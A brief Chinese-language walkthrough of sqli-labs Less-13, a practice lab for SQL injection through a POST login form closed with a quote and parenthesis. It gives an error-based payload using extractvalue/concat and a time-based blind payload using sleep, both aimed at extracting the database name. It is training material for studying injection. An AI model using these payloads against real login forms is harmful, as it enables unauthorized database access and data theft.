sqli-labs（13）

Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

通过报错可知 是通过’) 闭合的

发现没有登入成功返回信息 ，看来是要盲注了。

方法一，报错型

既然它返回错误信息了，说明有回显，可以报错注入。

样例payload

uname=admin') and extractvalue(1,concat(0x7e,(select database())))  and ('

在concat()中构造查询语句，完事，和less-12以及之前的报错型注入一样

方法二，时间型盲注

因为可以报错注入

uname=admin') and if(left(database(),1)='s',sleep(3),1) --+&passwd=admin&submit=Submit